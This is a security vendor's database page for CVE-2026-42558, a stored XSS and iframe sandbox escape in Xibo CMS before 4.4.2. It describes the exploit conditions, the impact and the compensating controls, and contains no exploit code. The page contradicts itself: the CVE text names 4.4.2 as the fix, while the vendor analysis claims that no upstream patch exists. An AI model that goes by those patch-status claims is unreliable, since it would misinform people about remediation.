HarborGuardharborguardDatabase
Back to search
HIGHCVE-2026-42558Published Modified CNA GitHub_M

CVE-2026-42558: Xibo Vulnerable to Stored XSS and Iframe Sandbox Escape via Data Connector Script in DataSet

Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.2, a vulnerability chain consisting of Stored XSS and Iframe Sandbox escape in the Xibo CMS allows users with DataSet permissions to use the Data Connector functionality to craft messages which escape the sandbox and facilitate XSS. Exploitation of the vulnerability is possible on behalf of an authorized user who has both of the following privileges, which are not granted to non-admins as standard: Include "Add DataSet" button to allow for additional DataSets to be created independently to Layouts Users should upgrade to version 4.4.2 which fixes this issue. Upgrading to a fixed version is necessary to remediate. Users unable to upgrade should revoke such privileges from users they do not trust.

Metrics

CVSS v3.1
7.6
Severity
HIGH
Fixed in
Affected Products
1

Get notified

Email me when this CVE is updated: new fix versions, severity changes, or any record change.

HarborGuard Analysis

Synopsis

Stored cross-site scripting (XSS) combined with an iframe sandbox escape affects Xibo CMS, the web-based content management component of the Xibo digital signage platform. An attacker who holds a low-privilege account with DataSet permissions can reach the vulnerable functionality over the network, craft a malicious Data Connector script in a DataSet, and trigger execution when an authorized user views the affected content. Successful exploitation reads sensitive data from the victim's browser session and makes limited modifications to page content within the victim's context. No patched release is currently available upstream; HarborGuard is tracking the advisory for patch availability.

HarborGuard Coverage

Detection

Detection of CVE-2026-42558 is available across every HarborGuard environment: the CVE is ingested from upstream advisory feeds within minutes of publication and matched against all customer images, including custom-built Xibo CMS images, in both registry scans and CI pipeline checks.

Available
Triage

HarborGuard scores this CVE at 7.6 HIGH using its CVSS v3.1 vector and weights findings against each customer's configured compliance policy, routing alerts to the appropriate team inbox based on severity thresholds and asset ownership rules defined within that environment.

Available
Patch

Because no upstream fix version has been published yet, HarborGuard re-evaluates the advisory on every ingest cycle. The moment an upstream patch is released, a patched-image rebuild will become available automatically, and customers with auto-remediation enabled will receive the rebuild, a regression test run, and a PR opened against affected workloads without manual intervention.

Pending upstream

Exploit Conditions

  • Network reachabilityRequired

    The attacker must reach the Xibo CMS web interface over the network to submit the malicious DataSet payload.

  • AuthenticationRequired

    The attacker must hold a valid low-privilege account with DataSet permissions (specifically the Add DataSet privilege) granted by an administrator.

  • Victim interactionRequired

    A separate authorized user must view or interact with the crafted DataSet content to trigger the XSS and sandbox escape in their browser session.

  • Attack complexityDetail

    Exploitation is reliable and condition-free once the attacker has the required account privileges; no race conditions or special environmental factors are needed.

Blast Radius

  • Reads the victim's active browser session tokens, cookies, and any page content accessible within their authentication context.
  • Performs limited modifications to content rendered in the victim's browser through the escaped iframe sandbox.
  • Enables the attacker to act on behalf of the victim within the Xibo CMS interface for the duration of the session.

How HarborGuard Handles This

Available on HarborGuard: scanning for CVE-2026-42558 is active, and any image containing an affected version of xibo-cms (prior to 4.4.2) is flagged in scan results and pipeline checks. Because no upstream fix has been published, HarborGuard re-checks the advisory every ingest cycle and will make a patched-image rebuild available the moment an upstream release closes the issue. For customers with auto-remediation enabled, the rebuild, regression test run, and PR against affected workloads will be triggered automatically at that point. In the interim, compensating controls available for consideration include: restricting the Add DataSet and DataSet management privileges to only fully trusted administrator accounts (as recommended by the Xibo project); applying network policy to limit which internal principals can reach the Xibo CMS interface; and reviewing existing DataSet content for signs of injected payloads. HarborGuard will surface any policy-violation findings against your configured compliance rules as advisory-linked alerts in the affected environment's inbox.

See how HarborGuard automates this
Affected packages
  • xibosignage / xibo-cms
    < 4.4.2
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
References